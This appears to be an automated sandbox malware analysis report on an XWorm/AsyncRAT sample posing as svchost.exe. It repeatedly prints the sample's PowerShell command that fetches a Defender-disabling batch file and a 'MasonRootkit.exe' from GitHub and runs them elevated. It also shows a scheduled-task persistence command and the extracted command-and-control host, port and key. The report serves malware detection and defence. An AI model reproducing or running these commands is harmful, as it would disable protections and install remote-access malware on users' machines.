$settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\svchost.exe.bin.exe", ParentImage: C:\Users\user\Desktop\svchost.exe.bin.exe, ParentProcessId: 6992, ParentProcessName: svchost.exe.bin.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP
                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\svchost.exe.bin.exe", ParentImage: C:\Users\user\Desktop\svchost.exe.bin.exe, ParentProcessId: 6992, ParentProcessName: svchost.exe.bin.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "svchost.exe.bin" /tr "C:\Users\user\AppData\Roaming\svchost.exe.bin.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "svchost.exe.bin" /tr "C:\Users\user\AppData\Roaming\svchost.exe.bin.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\svchost.exe.bin.exe", ParentImage: C:\Users\user\Desktop\svchost.exe.bin.exe, ParentProcessId: 6992, ParentProcessName: svchost.exe.bin.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "svchost.exe.bin" /tr "C:\Users\user\AppData\Roaming\svchost.exe.bin.exe", ProcessId: 4628, ProcessName: schtasks.exe
                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\svchost.exe.bin.exe", ParentImage: C:\Users\user\Desktop\svchost.exe.bin.exe, ParentProcessId: 6992, ParentProcessName: svchost.exe.bin.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\svchost.exe.bin.exe", ParentImage: C:\Users\user\Desktop\svchost.exe.bin.exe, ParentProcessId: 6992, ParentProcessName: svchost.exe.bin.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP

                Data Obfuscation

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\svchost.exe.bin.exe", ParentImage: C:\Users\user\Desktop\svchost.exe.bin.exe, ParentProcessId: 6992, ParentProcessName: svchost.exe.bin.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP

                Persistence and Installation Behavior

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "svchost.exe.bin" /tr "C:\Users\user\AppData\Roaming\svchost.exe.bin.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "svchost.exe.bin" /tr "C:\Users\user\AppData\Roaming\svchost.exe.bin.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\svchost.exe.bin.exe", ParentImage: C:\Users\user\Desktop\svchost.exe.bin.exe, ParentProcessId: 6992, ParentProcessName: svchost.exe.bin.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "svchost.exe.bin" /tr "C:\Users\user\AppData\Roaming\svchost.exe.bin.exe", ProcessId: 4628, ProcessName: schtasks.exe
                No Suricata rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: svchost.exe.bin.exeAvira: detected
                Source: group-coupon.gl.at.ply.ggAvira URL Cloud: Label: malware
                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exeAvira: detection malicious, Label: TR/Dropper.Gen
                Source: svchost.exe.bin.exeMalware Configuration Extractor: Xworm {"C2 url": ["group-coupon.gl.at.ply.gg"], "Port": 24196, "Aes key": "<123456789>", "SPL": "<Neptune>", "Install file": "USB.exe"}
                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exeReversingLabs: Detection: 76%
                Source: svchost.exe.bin.exeVirustotal: Detection: 72%Perma Link
                Source: svchost.exe.bin.exeReversingLabs: Detection: 76%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: svchost.exe.bin.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: svchost.exe.bin.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: ystem.pdb source: powershell.exe, 00000003.00000002.2290955846.000002A7F8AF3000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: CallSite.Target.pdb source: powershell.exe, 00000003.00000002.2290320709.000002A7F8A48000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000003.00000002.2291436459.000002A7F8C9B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000003.00000002.2291995920.000002A7F8D1A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \System.pdb source: powershell.exe, 00000003.00000002.2290955846.000002A7F8AF3000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000003.00000002.2291436459.000002A7F8C9B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000003.00000002.2290320709.000002A7F8A48000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbpu source: powershell.exe, 00000003.00000002.2291995920.000002A7F8D1A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: 56ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2291436459.000002A7F8C9B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: m.pdb source: powershell.exe, 00000003.00000002.2290955846.000002A7F8AF3000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb0 source: powershell.exe, 00000003.00000002.2291995920.000002A7F8D1A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: em.Core.pdbt source: powershell.exe, 00000003.00000002.2290955846.000002A7F8AF3000.00000004.00000020.00020000.00000000.sdmp

                Networking

                barindex
                Source: Malware configuration extractorURLs: group-coupon.gl.at.ply.gg
                Source: global trafficTCP traffic: 147.185.221.26 ports 1,2,4,24196,6,9
                Source: global trafficTCP traffic: 192.168.2.11:49708 -> 147.185.221.26:24196
                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
                Source: unknownDNS query: name: ip-api.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: ip-api.com
                Source: global trafficDNS traffic detected: DNS query: github.com
                Source: global trafficDNS traffic detected: DNS query: group-coupon.gl.at.ply.gg
                Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                Source: powershell.exe, 00000003.00000002.2256212350.000002A781691000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.com
                Source: svchost.exe.bin.exe, 00000000.00000002.2415167409.0000000002DD9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe.bin.exe, 00000000.00000002.2415167409.0000000002DF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                Source: svchost.exe.bin.exe, svchost.exe.bin.exe.0.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                Source: powershell.exe, 00000003.00000002.2285694720.000002A7901B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2285694720.000002A790072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000003.00000002.2256212350.000002A780233000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: svchost.exe.bin.exe, 00000000.00000002.2415167409.0000000002DAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
                Source: svchost.exe.bin.exe, 00000000.00000002.2415167409.0000000002DD9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe.bin.exe, 00000000.00000002.2415167409.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2256212350.000002A780001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000003.00000002.2256212350.000002A780233000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000003.00000002.2256212350.000002A780001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000003.00000002.2285694720.000002A790072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000003.00000002.2285694720.000002A790072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000003.00000002.2285694720.000002A790072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000003.00000002.2256212350.000002A781197000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2256212350.000002A78168B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
                Source: powershell.exe, 00000003.00000002.2256212350.000002A780233000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: svchost.exe.bin.exe.0.drString found in binary or memory: https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe
                Source: powershell.exe, 00000003.00000002.2256212350.000002A781197000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 00000003.00000002.2285694720.000002A7901B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2285694720.000002A790072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: svchost.exe.bin.exe, 00000000.00000002.2415167409.0000000002DAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                Source: svchost.exe.bin.exe, svchost.exe.bin.exe.0.drString found in binary or memory: https://raw.githubusercontent.com/76bh/img/main/Imagenep.png
                Source: svchost.exe.bin.exe, 00000000.00000002.2415167409.0000000002D8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/76bh/img/main/Imagenep.pngKeyT
                Source: svchost.exe.bin.exe, svchost.exe.bin.exe.0.drString found in binary or memory: https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703

                System Summary

                barindex
                Source: svchost.exe.bin.exe, type: SAMPLEMatched rule: Finds XWorm v2 samples based on characteristic strings Author: Sekoia.io
                Source: svchost.exe.bin.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0.0.svchost.exe.bin.exe.aa0000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm v2 samples based on characteristic strings Author: Sekoia.io
                Source: 0.0.svchost.exe.bin.exe.aa0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000000.00000000.1172627223.0000000000AA2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: Process Memory Space: svchost.exe.bin.exe PID: 6992, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exe, type: DROPPEDMatched rule: Finds XWorm v2 samples based on characteristic strings Author: Sekoia.io
                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeCode function: 0_2_00007FFABC405D820_2_00007FFABC405D82
                Source: C:\Users\user\Desktop\svchost.exe.bin.exeCode function: 0_2_00007FFABC404FD60_2_00007FFABC404FD6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFABC3FC5383_2_00007FFABC3FC538
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFABC3F40303_2_00007FFABC3F4030
                Source: svchost.exe.bin.exe, 00000000.00000000.1172627223.0000000000AA2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesvchost.exe< vs svchost.exe.bin.exe
                Source: svchost.exe.bin.exeBinary or memory string: OriginalFilenamesvchost.exe< vs svchost.exe.bin.exe
                Source: svchost.exe.bin.exe.0.drBinary or memory string: OriginalFilenamesvchost.exe< vs svchost.exe.bin.exe
                Source: svchost.exe.bin.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: svchost.exe.bin.exe, type: SAMPLEMatched rule: rat_win_xworm_v2 author = Sekoia.io, description = Finds XWorm v2 samples based on characteristic strings, creation_date = 2022-11-07, classification = TLP:CLEAR, version = 1.0, reference = https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/, id = 6cf06f52-0337-415d-8f29-f63d67e228f8
                Source: svchost.exe.bin.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0.0.svchost.exe.bin.exe.aa0000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v2 author = Sekoia.io, description = Finds XWorm v2 samples based on characteristic strings, creation_date = 2022-11-07, classification = TLP:CLEAR, version = 1.0, reference = https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/, id = 6cf06f52-0337-415d-8f29-f63d67e228f8
                Source: 0.0.svchost.exe.bin.exe.aa0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000000.00000000.1172627223.0000000000AA2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: Process Memory Space: svchost.exe.bin.exe PID: 6992, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exe, type: DROPPEDMatched rule: rat_win_xworm_v2 author = Sekoia.io, description = Finds XWorm v2 samples based on characteristic strings, creation_date = 2022-11-07, classification = TLP:CLEAR, version = 1.0, reference = https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/, id = 6cf06f52-0337-415d-8f29-f63d67e228f8
                Source: C:\Users\user\AppData\Roaming\svchost.exe.bin.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: svchost.exe.bin.exe, Difficult.csCryptographic APIs: 'TransformFinalBlock'
                Source: svchost.exe.bin.exe, Difficult.csCryptographic APIs: 'TransformFinalBlock'
                Source: svchost.exe.bin.exe.0.dr, Difficult.csCryptographic APIs: 'TransformFinalBlock'
                Source: svchost.exe.bin.exe.0.dr, Difficult.csCryptographic APIs: 'TransformFinalBlock'
                Source: svchost.exe.bin.exe.0.dr, Difficult.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: svchost.exe.bin.exe.0.dr, Difficult.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
